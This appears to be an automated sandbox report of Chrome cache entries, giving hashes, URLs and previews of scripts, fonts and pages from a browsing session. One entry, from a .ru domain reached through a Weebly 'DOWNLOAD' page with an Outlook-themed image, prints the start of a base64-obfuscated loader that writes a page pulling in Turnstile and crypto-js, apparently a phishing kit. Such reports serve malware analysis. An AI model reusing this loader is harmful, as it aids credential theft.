SHA-256:	F31B80562610135EDD91A86EC7F243C5EEAEC2EC08337E6A20C2D135D8E217DA
SHA-512:	319019C97A520D9D0FAC5487D614C41B7C766BDE2A60724966054B232427490817FF46E9F6AC82165343D50732C02E7F4821F4074908FE58775E3CEFE6812026
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/fonts/Montserrat/bold.woff2
Preview:	wOF2......20......{...1..........................v..H..4.`?STATD........D.u..@..6.$..\|. ..d. ...%kEGk.80@...E.b}...8.'....!..E.._X.....^...Ydj.e".7.-...........1]1."....o....p..).+...`0.H?s.&.h.D.."3........@V.._E@......s.{.....$.&.[k..Zv..r..a..[..2....-...T....`c.5E{s...J..........m...]m<>\.....(.@.K.S....../..R...9].&$ad0..`.Jf..;...[.,1.5zv70z...R.0..eY.-....;s.8..c.r.lJ....#0..$..;......M.YI...{....V....@......3.7.I%...);G..... ................9@.0.......)................C.<.6.p.K.$...`....J..s......q..r..B.Q.0.c.:..W....Fe.!........jU..\...p.?b........v....7..=..C..$.,s.D$...>.5..[..'......:..2.p...A..R2.. D..D..D.DD.TD.lD."D.Z.N..MoD_..... (h.Z# @K..1..dk!..5. {.....G.7....9O8..q..q0.}.Q....G......8.,.v...l'v.................I.-.aL.K....M?....P....%x..1..O...X..$..LU.. ...D%. .@6,/.@.t...4...n.$.....D.UA.\|..o.z;I....Tjk=Ym..p..H.4.{QX..F...<.b)&.#..Ho.<.W...?..C...V.eU.#.....z.PU.O....6..+..Eb..[...Zf...R.:..>.~.;...%...!..b_.X.`.Bt..

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	6503
Entropy (8bit):	4.7023238214875525
Encrypted:	false
SSDEEP:
MD5:	48E887857AEC23F184B0AA49C18D2445
SHA1:	9480776EB1666CD553A80F38316C6305943E5891
SHA-256:	0567021BC3973D113C6B0B6E68D0E9A8B53F38A7F60716C83214A133CC00139A
SHA-512:	1749DBA1B90947F5A3BC4C44B89ECDB5C1FD309569E87F00D4EB8B17C802CBBEAABF6CAF3D7E729DDD0D9D411C2464140708394AEEF9FF748242E5238312FB55
Malicious:	false
Reputation:	unknown
URL:	https://simatantincendi.weebly.com/files/theme/custom.js?1565969634
Preview:	jQuery(function($) {.. // Fixed nav. $.fn.checkHeaderPositioning = function(scrollEl, scrollClass) {. var $me = $(this);.. if (!$me.length) {. return;. }.. if($(scrollEl).scrollTop() > 50) {. $me.addClass(scrollClass);. } else if($(scrollEl).scrollTop() === 0) {. $me.removeClass(scrollClass);. }. };.. // Mobile sidebars. $.fn.expandableSidebar = function(expandedClass) {. var $me = this;.. $me.on('click', function() {. if(!$me.hasClass(expandedClass)) {. $me.addClass(expandedClass);. } else {. $me.removeClass(expandedClass);. }. });. }.. // Interval loop. $.fn.intervalLoop = function(condition, action, duration, limit) {. var counter = 0;. var looper = setInterval(function(){. if (counter >= limit \|\| $.fn.checkIfElementExists(condition)) {. clearInterval(looper);. } else {. action();. counter++;. }. }, duration);. }..

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (513), with no line terminators
Category:	downloaded
Size (bytes):	513
Entropy (8bit):	5.350826451115093
Encrypted:	false
SSDEEP:
MD5:	602C381194795DFC124FACDF48492EF1
SHA1:	90D594B7B5AF217824F2974514548C95FECFBFA5
SHA-256:	BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
SHA-512:	8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
Malicious:	false
Reputation:	unknown
URL:	https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
Preview:	var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined\|\|ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN\|\|"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	118
Entropy (8bit):	4.6210204155397765
Encrypted:	false
SSDEEP:
MD5:	F6BF880CA34C3E868763365FDC30B392
SHA1:	9B1B41E6AAE16E4FDCC28DBE92679D564352C8C5
SHA-256:	B884D8BFFBC6E1C794D4EAE301A9698B535F857D1837B9B9D60C4651A78A2E1E
SHA-512:	E6B361C088C285DD06A08B7CA42539887FD02B850664E353137A9CCA698560F9DB45B05BFE3F48A1F7EF307F2876005F83ADCD06C10F76CB30111E304D89294E
Malicious:	false
Reputation:	unknown
Preview:	{"jsonrpc":"2.0","method":null,"error":{"code":-32600,"message":"Invalid Request","http_response_code":400},"id":null}

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	852
Entropy (8bit):	4.904698699119914
Encrypted:	false
SSDEEP:
MD5:	91B360AE11A20A31E6A9CA60C6F6C691
SHA1:	EC3C5C553A20655C54B0A5577A15ABE576EFA9B1
SHA-256:	CF91769AE11889AD46B8090D0D4D58A4621F2BCEA35D1D8D96EA5E38BA34EE73
SHA-512:	DD4EF54C19FA63B71EA71137D66665BF07C031983CBB4D1D108D99DA9EE82255B8E72A0828AED446818A80D3B284504F77626F8E789506C459CB316FE008CAF4
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/fonts/Montserrat/font.css?2
Preview:	.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. src: url('./regular.eot'); /* IE9 Compat Modes /. src: url('./regular.eot?#iefix') format('embedded-opentype'), / IE6-IE8 /. url('./regular.woff2') format('woff2'), / Super Modern Browsers /. url('./regular.woff') format('woff'), / Modern Browsers /. url('./regular.ttf') format('truetype'); / Safari, Android, iOS /.}..@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 700;. src: url('./bold.eot'); / IE9 Compat Modes /. src: url('./bold.eot?#iefix') format('embedded-opentype'), / IE6-IE8 /. url('./bold.woff2') format('woff2'), / Super Modern Browsers /. url('./bold.woff') format('woff'), / Modern Browsers /. url('./bold.ttf') format('truetype'); / Safari, Android, iOS */.}

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	67465
Entropy (8bit):	4.809594108927749
Encrypted:	false
SSDEEP:
MD5:	2B8D85F1EA01D2C3E8B962EAC8D76A5C
SHA1:	936987A7E08DAA4A916C77D86937EDEE42D657DA
SHA-256:	B6353CA52760ABA4E7547AE9861DB68158DC2AF0F4FEBECE55E5C775EE4449F5
SHA-512:	F64D0E9FC7ED02F4C7B3CF7FD680DF3A6F8F4CEFADEEA63553D0F0A4BB5472ABF5EE754C0E056CD91272F0108910347BA6F3CF23C825FD89260CF0545DD0702A
Malicious:	false
Reputation:	unknown
Preview:	./! Hammer.JS - v2.0.4 - 2014-09-28. http://hammerjs.github.io/. . Copyright (c) 2014 Jorik Tangelder;. * Licensed under the MIT license /.(function(window, document, exportName, undefined) {. 'use strict';..var VENDOR_PREFIXES = ['', 'webkit', 'moz', 'MS', 'ms', 'o'];.var TEST_ELEMENT = document.createElement('div');..var TYPE_FUNCTION = 'function';..var round = Math.round;.var abs = Math.abs;.var now = Date.now;../. set a timeout with a given scope. * @param {Function} fn. * @param {Number} timeout. * @param {Object} context. * @returns {number}. /.function setTimeoutContext(fn, timeout, context) {. return setTimeout(bindFn(fn, context), timeout);.}../. if the argument is an array, we want to execute the fn on each entry. * if it aint an array we don't want to do a thing.. * this is used by all the methods that accept a single and array argument.. * @param {\|Array} arg. @param {String} fn. * @param {Object} [context]. * @returns {Boolean}. */.function invokeArr

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65024)
Category:	dropped
Size (bytes):	188909
Entropy (8bit):	5.041200648730947
Encrypted:	false
SSDEEP:
MD5:	F35D83B5554D4B4098D115F8C6FA4190
SHA1:	C3A3718A2BCC97956A6FC19341F5CA45883D9C8F
SHA-256:	0F86EAECBB74174EBB700CC768966211E698A7E6BF6B19227CD0B89DB43E14A0
SHA-512:	24F02BC7CAF38B48D5B1017903DC2BAE866CE738AF4F56D398E4F14A42D4B58364224860A29CB6B16E1C8A709CEF13EFB07F584DA1B2DA75BFBCDDA359EF0DDE
Malicious:	false
Reputation:	unknown
Preview:	.window._W = window.Weebly = window.Weebly \|\| {};._W.getSiteLanguageURL = function(lang){..return '//assets-staging.weebly.net/js/lang/%lang%/stl.js?buildTime=1234&'.replace('%lang%', lang);.}._W.tli=function(s){return s;}._W.siteLang = 'en';._W.ftl=_W.stl=(function() {..var f = function(s) {...var t = tls[s] \|\| s;...var a = Array.prototype.slice.call(arguments, 1);...for (var i = 0; i < a.length; i++) {....t = t.split('{{'+i+'}}').join(a[i]);...}......return t ? t.replace(/^\\s(.+?)\\s$/, '$1') : s;..},..tls = JSON.parse('{\"authorize_net.errors.E_WC_04\":\"Please provide mandatory field.\",\"authorize_net.errors.E_WC_05\":\"Please provide valid credit card number.\",\"authorize_net.errors.E_WC_06\":\"Please provide valid expiration month.\",\"authorize_net.errors.E_WC_07\":\"Please provide valid expiration year.\",\"authorize_net.errors.E_WC_08\":\"Expiration date must be in the future.\",\"authorize_net.errors.E_WC_15\":\"Please provide valid CVV.\",\"authorize_net.errors.E_WC_16\

Chrome Cache Entry: 124

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (13080)
Category:	downloaded
Size (bytes):	13081
Entropy (8bit):	4.750842007265326
Encrypted:	false
SSDEEP:
MD5:	F552AAA953ABC73D770EF87C97E8FF81
SHA1:	CA8363C8DDD8900B2900F37431537EAB9CAC78E5
SHA-256:	45329AF9D3B1F3B9AE94F51A0F7F56F32ABAD2F921F5DC19B2DE306403FC8C86
SHA-512:	0A22F7D5168DC0F7D0E2B38DF727CB86DA926671F0E227378EE79A07E814A04F2916AC7E0A942039442A0170EFE295BC34E8E18BB995A9CBAF4C36B32E949657
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/css/social-icons.css?buildtime=1733963355
Preview:	@font-face{font-family:"wsocial";src:url(//cdn2.editmysite.com/fonts/wSocial/wsocial.eot?ts=1733960465857);src:url(//cdn2.editmysite.com/fonts/wSocial/wsocial.eot?ts=1733960465857#iefix) format("embedded-opentype"),url(//cdn2.editmysite.com/fonts/wSocial/wsocial.woff?ts=1733960465857) format("woff"),url(//cdn2.editmysite.com/fonts/wSocial/wsocial.ttf?ts=1733960465857) format("truetype"),url(//cdn2.editmysite.com/fonts/wSocial/wsocial.svg?ts=1733960465857#wsocial) format("svg");font-weight:normal;font-style:normal}.wsite-social-dribbble:before{content:"\e60c"}.wsite-com-product-social-dribbble:before{content:"\e60c"}.wsite-social-color .wsite-social-dribbble:before{content:"\e60c";color:#f077a0}.wsite-social-square .wsite-social-dribbble,.wsite-social-square.wsite-social-dribbble{background-color:#f077a0}.wsite-social-square .wsite-social-dribbble:after,.wsite-social-square.wsite-social-dribbble:after{content:"\e60c";color:#ffffff}.wsite-social-mail:before{content:"\e603"}.wsite-com-pro

Chrome Cache Entry: 127

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (41651)
Category:	dropped
Size (bytes):	131537
Entropy (8bit):	5.2237799798561975
Encrypted:	false
SSDEEP:
MD5:	30B7C335C62E5269E2D35B8E8B9F44B4
SHA1:	C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
SHA-256:	10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
SHA-512:	5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
Malicious:	false
Reputation:	unknown
Preview:	(function(){/*. @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. /.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a[""]\|\|{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0\|\|r===1&&n[2]===".."\|\|n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u\|\|y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	4286
Entropy (8bit):	4.191445610755576
Encrypted:	false
SSDEEP:
MD5:	4D27526198AC873CCEC96935198E0FB9
SHA1:	B98D8B73AD6A0F7477C3397561B4AAB37BF262AA
SHA-256:	40A2146151863BCF46C786D596E81A308D1B0D26D74635BE441E92656F29B1B4
SHA-512:	1EE4B73F4DA9C2B237CD0B820FFAD8E192D9125CE7D75D8A45A8B9642CE5FE85736646CAF12D246A77364C576751C47919997D066587F17575442A9B9F7CC97F
Malicious:	false
Reputation:	unknown
Preview:	...... .... .........(... ...@..... .....................................................................................................................................................................................................................................................................................................................D;3.C;4.D;3.D<3.D<3.D<6.A2".Pc..........M>5.....E;4.D;3.D;3.D<3.F<5.E<4.................................................F?4.ID5.D<37C;3.C;2.C;2.C;2.C;3.D<3LE=3.E=2.D<3.D=3.C<2QC;2.C;2.C;2.C;2.D;3.D;46JB;.G>6.....................................E;4.H<5.D;3]C;2.C;2.C;2.C;2.C;2.C;2.C;2.D<2.G<3.G<4.D<3.C;2.C;2.C;2.C;2.C;2.C;2.C;2.D<3[C=7.C<4.............................H<7.B;1.D<3CC;2.C;2.C;2.C;2.C;2.C;2.C;2.C;2.C;2.D<2nD<3sC;2.C;2.C;2.C;2.C;2.C;2.C;2.C;2.C;2.D<3@B:3.HA2.........................D<3.E<4.C;2.C;2.C;2.C;2.D<2.C;2bD<3pC<2.C;2.C;2.C;2.C;2.C;2.C;2.C;2.D<3lD<3^D;2.C;2.C;2.C;2.C;2.E<3.D<3.........................C;2.D<3FC;2.C;2.C;2.D;2.F=3.E=

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (861)
Category:	downloaded
Size (bytes):	21643
Entropy (8bit):	5.335360010038081
Encrypted:	false
SSDEEP:
MD5:	F1B9D027DE04E1B8A425EE0559C30A31
SHA1:	B1CB56BA33341812BC6F35B19581AF37C05923F2
SHA-256:	9E7CB245EF70E3AE6977FABC5764810291940E4314D8B5031CFFFE691EAA2327
SHA-512:	053C1240955205D65382A2D8F2664F74B334AE1DB2230C56D480F2808A3D98231CD9FFC05A70023494D0BFA06F2D4AD1BDF95D1D317E32243784F02E5B1CFA8F
Malicious:	false
Reputation:	unknown
URL:	https://simatantincendi.weebly.com/
Preview:	<!DOCTYPE html>.<html lang="en">..<head>...<title>My Site - DOWNLOAD</title><meta property="og:site_name" content="My Site" />.<meta property="og:title" content="My Site" />.<meta property="og:description" content="My Site" />.<meta property="og:image" content="https://simatantincendi.weebly.com/uploads/1/5/1/6/151679959/posta-daniele-caringi-outlook-12-12-2024-06-45-pm.png" />.<meta property="og:url" content="https://simatantincendi.weebly.com/" />....<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.......<link id="wsite-base-style" rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/sites.css?buildTime=1733963355" />.<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/old/fancybox.css?1733963355" />.<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/social-icons.css?buildtime=1733963355" media="screen,projection" />.<link rel="stylesheet"

Chrome Cache Entry: 131

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47691)
Category:	dropped
Size (bytes):	47692
Entropy (8bit):	5.401573598696506
Encrypted:	false
SSDEEP:
MD5:	B0B3774E70E752266B4CF190E6D95053
SHA1:	03823D33D8C374DD69B66F1D75A5FC93D29967E1
SHA-256:	A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
SHA-512:	8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
Malicious:	false
Reputation:	unknown
Preview:	"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 133

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3600), with no line terminators
Category:	downloaded
Size (bytes):	3600
Entropy (8bit):	5.0991703557984245
Encrypted:	false
SSDEEP:
MD5:	40B81B2D52BA9D2E2C64C31FF6A24CD7
SHA1:	6B5689250661646ECBB841F2475F1556A113373C
SHA-256:	E06BACA13F25DF9C7D684FC1B1FDFBBBB95070A1D5A9CD648632DA7BCCC90B96
SHA-512:	5657EE166A1EFF5DEEA7A0125EDD6178541396DCCB035785F5790BC1C57DEE6B0E1C9D063D00333E95667F699D99172796CE301EDD1DF2C4BFF02D25536F0D0C
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/js/site/footerSignup.js?buildTime=1734044655
Preview:	(function(t){var e={};function r(n){if(e[n])return e[n].exports;var i=e[n]={exports:{},id:n,loaded:false};t[n].call(i.exports,i,i.exports,r);i.loaded=true;return i.exports}r.m=t;r.c=e;r.p="https://cdn2.editmysite.com/js/";r.p="https://"+window.ASSETS_BASE+"/js/"\|\|r.p;return r(0)})({0:function(t,e,r){t.exports=r(610)},610:function(t,e){(function(t,e){var r={height:62,mobileHeight:124,getHeight:function(){if(u()){return r.mobileHeight}return r.height}};function n(e,n){var u=t("#weebly-footer-signup-container-v3");if(!u.length){return}i(e,n);r.element=u;r.iframe=t("#weebly-footer-signup-iframe");if(!o()){r.element.remove();return}a();s();l();t(window).on({resize:p(l,500),scroll:p(l,500)})}function i(e,r){var n='<link href="//'+e+"/css/free-footer-v3.css?buildtime="+r+'" rel="stylesheet">';t(n).appendTo("head")}function o(){var e=t("body");var r=!!document.getElementById("kb-container");var n=e.hasClass("splash-page");return!(r\|\|n)}function a(){var e=t("body");e.css({minHeight:"100%",posit

Chrome Cache Entry: 134

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (7497), with CRLF line terminators
Category:	downloaded
Size (bytes):	19576
Entropy (8bit):	5.865307662251416
Encrypted:	false
SSDEEP:
MD5:	9AB43E6D37A6A1B4E6593D0BA875B9E8
SHA1:	E6C7FDD52DC10145975203FB7106ADEF43342185
SHA-256:	1B16E505F3A636570074442C6CC57A6352BD9249445FB0EC26FB7700A3F631B7
SHA-512:	95B020D44B7B4CBD052ABE25A2DEFA37A43D16EE927EC74B69944BF66ACF30E6B1666FA733386CF484F171AFA77DF31681F091C432A4722E7A0B7731E46D1256
Malicious:	false
Reputation:	unknown
URL:	https://684.termlicari.ru/HnkNbg/
Preview:	<script>....if(atob("aHR0cHM6Ly9lcTl3LnRlcm1saWNhcmkucnUvSG5rTmJnLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNyaVNBb2lqckdsIGg0e21hc

Chrome Cache Entry: 140

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (955), with CRLF line terminators
Category:	downloaded
Size (bytes):	201253
Entropy (8bit):	2.661810841903416
Encrypted:	false
SSDEEP:
MD5:	85DE642E1467807F64F7E10807DF3869
SHA1:	C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
SHA-256:	5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
SHA-512:	BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0
Preview:	..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="

Chrome Cache Entry: 144

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	15
Entropy (8bit):	3.189898095464287
Encrypted:	false
SSDEEP:
MD5:	39A19D0882684989864FA50BCED6A2D1
SHA1:	5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
SHA-256:	8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
SHA-512:	E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
Malicious:	false
Reputation:	unknown
URL:	https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Preview:	/* empty css */

Chrome Cache Entry: 145

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (545)
Category:	dropped
Size (bytes):	560083
Entropy (8bit):	5.670807885144341
Encrypted:	false
SSDEEP:
MD5:	81697E6CDD98E37117D7BDDCECF07576
SHA1:	0EA9EFEB29EFC158CD175BB05B72C8516DBAA965
SHA-256:	73DD640564004EC8730E7F3433B9DFAA6876AC3A27E6964A17834F07F6D56116
SHA-512:	FC29D4A1FD39A7C78B7F57B221596ACEE9B805A133CE2D6FF4BC497A7B3584AB10E3D4FFDE30C86884F1ABEAC7D521598EBDA6E0B01FC92525986C98250FA3F8
Malicious:	false
Reputation:	unknown
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var T=function(){return[function(r,d,h,V,R,K,Y,S,N,D,F,E,l,B,C,m){return(r\|32)==(((C=["fr","flat",2],r)-C[2]>>4\|\|(m=new Promise(function(P){window.addEventListener("visibilitychange",P,{once:!0}),document.hidden\|\|P()})),r-7>>4)\|\|(E=[2654435761,0,"1"],Y.wb=K===void 0?!1:K,B=b[38](26,Y,V),N=g[16](55,B),Y[C[0]]=N.next().value,Y.C=N.next().value,Y.rI=N.next().value,Y.Zf=N.next().value,F=Y.R()[C[1]](Infinity),S=F.findIndex(function(P){return P instanceof dy&&k[17](15,P,h)==d}),l=g[9](5,F[S],lj,3,p[12](77)),.D=[n[48](22,Y[C[0]]),A[43](38,Y.rI,U[9](11,Y[C[0]]),E[0]),A[10](27,3,Y.rI,U[9](19,Y.rI),E[1]),A[10](28,3,Y.Zf,U[9

Chrome Cache Entry: 147

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 113 x 109, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3213
Entropy (8bit):	7.91049590052094
Encrypted:	false
SSDEEP:
MD5:	F892388BD975385993F1A2823772B037
SHA1:	D5F877EB3B4C76D44A20F1E95D3FE315D45C7556
